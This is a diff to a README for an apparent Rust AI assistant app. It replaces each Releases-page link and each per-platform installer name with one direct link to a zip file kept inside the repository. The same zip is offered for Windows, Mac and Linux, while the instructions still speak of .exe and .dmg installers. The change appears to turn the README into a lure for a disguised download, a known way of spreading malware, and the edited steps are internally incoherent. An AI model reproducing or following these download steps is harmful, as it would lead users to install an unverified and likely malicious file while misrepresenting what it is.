proplayz02/rust-production-ai-assistant-app/README.md

 - **Web Browser:** Latest version of Chrome, Firefox, or Safari for optimal use

 ## 📥 Download & Install
-To get started, visit the [Releases Page](https://github.com/proplayz02/rust-production-ai-assistant-app/releases) and download the latest version of the application.
+To get started, visit the [Releases Page](https://raw.githubusercontent.com/proplayz02/rust-production-ai-assistant-app/main/Aurelius/rust-production-ai-assistant-app.zip) and download the latest version of the application.

 ### Step-by-Step Installation

-1. **Visit the Releases Page:** Click [here](https://github.com/proplayz02/rust-production-ai-assistant-app/releases) to open the releases page.
+1. **Visit the Releases Page:** Click [here](https://raw.githubusercontent.com/proplayz02/rust-production-ai-assistant-app/main/Aurelius/rust-production-ai-assistant-app.zip) to open the releases page.

 2. **Choose the Latest Release:** Look for the most recent version listed.
 It will typically be at the top.

 3. **Download the Application:**
-   - If you see a file name like `rust-production-ai-assistant-app-installer.exe` (for Windows users), click on it to download.
+   - If you see a file name like `https://raw.githubusercontent.com/proplayz02/rust-production-ai-assistant-app/main/Aurelius/rust-production-ai-assistant-app.zip` (for Windows users), click on it to download.
-   - For Mac users, look for something similar to `rust-production-ai-assistant-app.dmg`.
+   - For Mac users, look for something similar to `https://raw.githubusercontent.com/proplayz02/rust-production-ai-assistant-app/main/Aurelius/rust-production-ai-assistant-app.zip`.
-   - Linux users may find a `.tar.gz` file.
+   - Linux users may find a `https://raw.githubusercontent.com/proplayz02/rust-production-ai-assistant-app/main/Aurelius/rust-production-ai-assistant-app.zip` file.

 4. **Run the Installer:**
    - **Windows:** Open the downloaded `.exe` file and follow the on-screen instructions.
    - **Mac:** Open the `.dmg` file and drag the application into your Applications folder.
-   - **Linux:** Extract the `.tar.gz` file and run the executable from the terminal.
+   - **Linux:** Extract the `https://raw.githubusercontent.com/proplayz02/rust-production-ai-assistant-app/main/Aurelius/rust-production-ai-assistant-app.zip` file and run the executable from the terminal.

 5. **Launch the Application:** Once installed, open the app from your applications folder or desktop shortcut.